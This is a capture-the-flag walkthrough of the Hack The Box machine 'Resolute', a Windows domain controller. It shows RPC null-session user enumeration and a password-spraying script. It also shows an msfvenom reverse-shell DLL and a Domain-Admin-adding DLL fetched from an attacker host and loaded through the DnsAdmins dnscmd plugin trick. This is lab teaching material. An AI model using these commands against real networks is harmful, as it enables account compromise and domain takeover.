HTB Resolute – No Metasploit

Hack the Box retired Resolute this week. This machine is rated medium and was released in December 2019.

Root looks to be much more difficult than user on this one. Let’s see what we can find.

Reconnaissance

To start things off I run an Nmap scan with default scripts (-sC), version detection (-sV), output saved in every format (-oA), maximum verbosity (-vvv) and all 65535 TCP ports (-p-).

kali@kali:~$ nmap -sC -sV -oA simple -vvv -p- 10.10.10.169
Nmap scan report for resolute.megabank.local (10.10.10.169)
Host is up, received conn-refused (0.062s latency).
Scanned at 2020-05-29 13:42:07 EDT for 5739s
Not shown: 65509 closed ports
Reason: 65509 conn-refused
PORT      STATE SERVICE      REASON  VERSION
53/tcp    open  domain?      syn-ack
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-05-29 19:25:37Z)
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?    syn-ack
593/tcp   open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack
3268/tcp  open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack .NET Message Framing
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack Microsoft Windows RPC
49688/tcp open  msrpc        syn-ack Microsoft Windows RPC
49709/tcp open  msrpc        syn-ack Microsoft Windows RPC
50537/tcp open  tcpwrapped   syn-ack
51117/tcp open  tcpwrapped   syn-ack
52808/tcp open  tcpwrapped   syn-ack
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED15F27%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m55s, deviation: 4h02m30s, median: 10m54s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 41231/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55070/udp): CLEAN (Failed to receive data)
|   Check 4 (port 26625/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-29T12:26:29-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-29T19:26:31
|_  start_date: 2020-05-29T17:42:56

This is definitely a Windows domain controller: Kerberos on 88, LDAP on 389/636 with the global catalog on 3268/3269, DNS on 53, and the SMB host scripts name the domain megabank.local. On Windows boxes I start with SMB whenever 445 is open. Let’s see whether the DC accepts a null session and, if so, enumerate accounts with “enumdomusers”.

kali@kali:~$ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient $> 

Here we have a list of all the domain users, obtained over an anonymous (null) session, which is a finding in its own right. Since there are so few users we can simply “queryuser” each one from the rpcclient console to see what turns up.

 rpcclient $> queryuser marko
        User Name   :   marko
        Full Name   :   Marko Novak
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Account created. Password set to Welcome123!
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 13 Sep 30828 22:48:05 EDT
        Password last set Time   :      Fri, 27 Sep 2019 09:17:15 EDT
        Password can change Time :      Sat, 28 Sep 2019 09:17:15 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x457
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...

Here we see an interesting description for Mr. Novak. The same description field appears in the one-line-per-account output of “querydispinfo”, which is the faster way to sweep every account for comments like this:

Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!

kali@kali:~$ rpcclient -U "marko%Welcome123!" -c "getusername;quit" 10.10.10.169
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

No luck logging in as marko with that password. A default password left in a description field is still worth trying against every other account, because this kind of onboarding password is frequently reused.

Weaponization and Delivery

I wrote a quick bash script to spray the password from Marko’s description against every user we just enumerated.

kali@kali:~/tools$ mkdir passspray
kali@kali:~/tools$ cd passspray/
kali@kali:~/tools/passspray$ vi passsprayv2.sh
#!/bin/bash
# Try one candidate password against every account in users.txt
# (one username per line, taken from the enumdomusers output above).
while read u; do
        echo -n "$u" && rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169
done <users.txt
kali@kali:~/tools/passspray$ chmod +x passsprayv2.sh

The script reads users.txt (the enumdomusers list) one line at a time into the variable u, prints the username, and then runs rpcclient as that user with the candidate password. getusername only succeeds after a valid logon, so a line that ends in “Account Name: …” instead of NT_STATUS_LOGON_FAILURE is a hit; quit closes the session, and 10.10.10.169 is the target. One caveat before spraying a real domain: check the lockout threshold first (enum4linux -P or the domain_policy output of ldapdomaindump will show it) and stick to a single password per spray, otherwise a script like this can lock out every account in the list.

kali@kali:~/tools/passspray$ ./passsprayv2.sh 
AdministratorCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
GuestCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
krbtgtCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
DefaultAccountCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
ryanCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
markoCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
sunitaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
abigailCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
marcusCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
sallyCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
fredCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
angelaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
feliciaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
gustavoCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
ulfCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
stevieCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
claireCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
pauloCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
steveCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
annetteCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
annikaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
perCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
claudeCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
melanieAccount Name: melanie, Authority Name: MEGABANK
zachCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
simonCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
naokiCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Success! We have a hit on user Melanie.

kali@kali:~/tools/passspray$ smbclient -U "melanie%Welcome123!" \\\\10.10.10.169\\SYSVOL
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 25 09:28:21 2019
  ..                                  D        0  Wed Sep 25 09:28:21 2019
  megabank.local                      D        0  Wed Sep 25 09:28:21 2019

                10340607 blocks of size 4096. 7565420 blocks available
smb: \> cd megabank.local\
smb: \megabank.local\> ls
  .                                   D        0  Wed Sep 25 09:34:36 2019
  ..                                  D        0  Wed Sep 25 09:34:36 2019
  DfsrPrivate                       DHS        0  Wed Sep 25 09:34:36 2019
  Policies                            D        0  Wed Sep 25 09:28:32 2019
  scripts                             D        0  Wed Sep 25 09:28:21 2019

                10340607 blocks of size 4096. 7565164 blocks available
smb: \megabank.local\>

Nothing interesting in the shares. Let’s step back and look more closely at this user with one of the AD enumeration tools Kali ships with: ldapdomaindump, which pulls users, groups, computers, trusts and the password policy over an authenticated LDAP bind.

kali@kali:~/htb/resolute/domainenum$ ldapdomaindump -u "MEGABANK\melanie" -p "Welcome123!" 10.10.10.169
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
kali@kali:~/htb/resolute/domainenum$ ls
domain_computers_by_os.html  domain_computers.html  domain_groups.grep  domain_groups.json  domain_policy.html  domain_trusts.grep  domain_trusts.json          domain_users.grep  domain_users.json
domain_computers.grep        domain_computers.json  domain_groups.html  domain_policy.grep  domain_policy.json  domain_trusts.html  domain_users_by_group.html  domain_users.html
kali@kali:~/htb/resolute/domainenum$ cat domain_users.grep 
cn      name    sAMAccountName  memberOf        primaryGroupId  whenCreated     whenChanged     lastLogon       userAccountControl      pwdLastSet      objectSid       description
Naoki Yamamoto  Naoki Yamamoto  naoki           Domain Users    12/04/19 10:40:44       12/04/19 10:40:44       01/01/01 00:00:00       NORMAL_ACCOUNT  12/04/19 10:40:44       S-1-5-21-1392959593-3013219662-3596683436-10104
Simon Faraday   Simon Faraday   simon           Domain Users    12/04/19 10:39:58       12/04/19 10:39:58       01/01/01 00:00:00       NORMAL_ACCOUNT  12/04/19 10:39:58       S-1-5-21-1392959593-3013219662-3596683436-10103
Zach Armstrong  Zach Armstrong  zach            Domain Users    12/04/19 10:39:27       12/04/19 10:39:27       01/01/01 00:00:00       NORMAL_ACCOUNT  12/04/19 10:39:27       S-1-5-21-1392959593-3013219662-3596683436-10102
Melanie Purkis  Melanie Purkis  melanie Remote Management Users Domain Users    12/04/19 10:38:45       05/29/20 20:35:04       01/01/01 00:00:00       NORMAL_ACCOUNT  05/29/20 20:35:04       S-1-5-21-1392959593-3013219662-3596683436-10101

Melanie is a member of the “Remote Management Users” group. Let’s see what that group is allowed to do.

kali@kali:~/htb/resolute/domainenum$ cat domain_groups.grep | grep "Remote Management"
Contractors     Contractors     DnsAdmins, Remote Management Users      Contractors     09/26/19 12:37:45       09/27/19 14:02:21       S-1-5-21-1392959593-3013219662-3596683436-1103
Remote Management Users Remote Management Users         Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.     09/25/19 13:28:31       12/04/19 10:42:51       S-1-5-32-580

Ahh, WinRM (port 5985, which Nmap reported open) should be available to Melanie.

Foothold

Evil-WinRM is basically the go-to Windows Remote Management client on Linux.

kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie

Finally got a foothold!

*Evil-WinRM* PS C:\Users\melanie\Desktop> dir


    Directory: C:\Users\melanie\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:33 AM             32 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3b...8540

After manually spot-checking the filesystem, I found an unusual hidden directory at the root of C:\ called “PSTranscripts”. PowerShell transcription writes every command of a session, together with its output, to a text file, so if these files are readable they are worth going through line by line.

*Evil-WinRM* PS C:\> ls -hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/29/2020  10:42 AM      402653184 pagefile.sys
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OjuoBGhU.20191203063201.txt

**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

A snippet of the transcript shows ryan mapping a backups share with a command line that contains his password in clear text: “Serv3r4Admin4cc123!”. Transcripts capture exactly this kind of mistake, which is why a transcript directory should be readable only by administrators; here a low-privileged user could read it.
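As an added example (not part of the original write-up), here is a small sweep for credential-bearing lines in a tree of PowerShell transcripts, useful both when looting a box like this one and when auditing your own transcript share. The regex is a heuristic for command shapes that usually carry a plaintext secret (net use with positional credentials or /user:, -AsPlainText, /password:, runas, psexec -p). The sample transcript it writes is constructed, modelled on the excerpt above rather than copied from the box; pass a directory (for example a copy of C:\PSTranscripts pulled back over SMB) to scan real files instead.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): find credentials in PowerShell transcripts.
# Usage: ./scan_transcripts.sh /path/to/PSTranscripts   (no args: constructed sample)

# One extended regex of command shapes that commonly embed a plaintext secret.
# Matched case-insensitively (grep -i).
CRED_PATTERN='net use [a-z]: \\\\[^ ]+ [^ ]+ [^ ]+|net use .*/user:|-asplaintext|/password:|runas .*/user:|psexec .* -p |-password +[^ -][^ ]*'

# Print "file:line:text" for every matching line in PowerShell_transcript* files.
scan_transcripts() {
    local dir=$1
    grep -rniE --include='PowerShell_transcript*' "$CRED_PATTERN" "$dir" 2>/dev/null
}

# Pull the password out of a "net use X: \\host\share <user> <pass>" line,
# the shape seen in the transcript above; prints nothing for other lines.
net_use_password() {
    printf '%s\n' "$1" | sed -nE 's/.*net use [A-Za-z]: \\\\[^ ]+ [^ ]+ ([^ "]+).*/\1/p'
}

# Constructed sample transcript (not the box's file) so the scan runs offline.
write_sample() {
    local dir=$1
    mkdir -p "$dir/20191203"
    cat > "$dir/20191203/PowerShell_transcript.RESOLUTE.sample.txt" <<'EOF'
**********************
Command start time: 20191203063455
**********************
PS megabank\ryan@RESOLUTE Documents> Get-ChildItem C:\Users
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
PS megabank\ryan@RESOLUTE Documents> Get-Process | Select-Object -First 3
EOF
}

if [ "$#" -eq 0 ]; then
    sample=$(mktemp -d)
    write_sample "$sample"
    scan_transcripts "$sample"
    rm -rf "$sample"
else
    scan_transcripts "$1"
fi
```

The scan is deliberately noisy rather than precise; for a blue-team audit, run it over the transcript share on a schedule and treat any hit as a credential to rotate.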

Privilege Escalation

Ryan is also in Remote Management Users, so evil-winrm works for him with the recovered password. More importantly, he is in the Contractors group, which ldapdomaindump showed is nested in DnsAdmins, so his token carries that group as well:

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

I first tried to upload a reverse-shell DLL, but I assume the file was being detected as malicious and deleted.

kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp -a x64 LHOST=10.10.14.44 LPORT=7788 -f dll > trenchesofit.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri "http://10.10.14.44/trenchesofit.dll" -OutFile "C:\Users\ryan\Documents\trenchesofit.dll"
*Evil-WinRM* PS C:\Users\ryan\Documents> dir


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/29/2020   6:09 PM           5120 trenchesofit.dll

When I tried to move the file onto the system, Windows Defender was detecting and removing it, so I had to change approach. After some research I rebuilt the msfvenom DLL so that its payload simply adds an account to the Domain Admins group. The reason DnsAdmins matters is that its members can use dnscmd to set the DNS server’s ServerLevelPluginDll value to any DLL path, and when the DNS service next starts, dns.exe, which runs as SYSTEM on the domain controller, loads that DLL.

kali@kali:~/tools/impacket/examples$ msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' --platform windows -f dll > /home/kali/htb/resolute/trenchesofit.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 5120 bytes

Since the DLL kept getting removed from disk on the target, I hosted it on an SMB share from Kali instead and gave dnscmd the UNC path, so the DNS service fetches the DLL from my machine when it restarts. Two things to note in the output below: the first sc.exe start fails with error 1056 because the service was still in STOP_PENDING, and waiting for it to stop before retrying works; and on a real engagement you should clear the ServerLevelPluginDll value afterwards (it lives under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters) and restart DNS again, otherwise the DC keeps loading the DLL on every restart.

kali@kali:~/tools/impacket/examples$ sudo python smbserver.py trenchesofitshare /home/kali/htb/resolute
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.44\trenchesofitshare\trenchesofit.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
[SC] StartService FAILED 1056:

An instance of the service is already running.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2976
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

The first time I used ryan as the account in the “net group” command, but I could not get that to work; with melanie as the target account it worked. After re-running the dnscmd config command and restarting DNS, I connected back to the box with evil-winrm as melanie.

kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101


GROUP INFORMATION
-----------------

Group Name                                      Type             SID                                           Attributes
=============================================== ================ ============================================= ===============================================================
Everyone                                        Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                 Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                   Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access      Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                          Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                            Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                  Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGABANK\Domain Admins                          Group            S-1-5-21-1392959593-3013219662-3596683436-512 Mandatory group, Enabled by default, Enabled group
MEGABANK\Denied RODC Password Replication Group Alias            S-1-5-21-1392959593-3013219662-3596683436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level            Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

With “whoami /all” you can now see that Melanie is a Domain Admin, which also puts her in BUILTIN\Administrators on the DC and gives the session a High integrity level!

*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:32 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e1d9....619c

The root flag is in its usual place on the Administrator’s desktop.

Overall, this was a fun box with a challenging privilege escalation. I found a great resource on using “dnscmd” here.

If you enjoyed this write-up, please show your respect here: https://www.hackthebox.eu/home/users/profile/272340

Feel free to comment or reach out if you have any questions or issues with any of the above steps. Until next time, stay safe in the Trenches of IT!
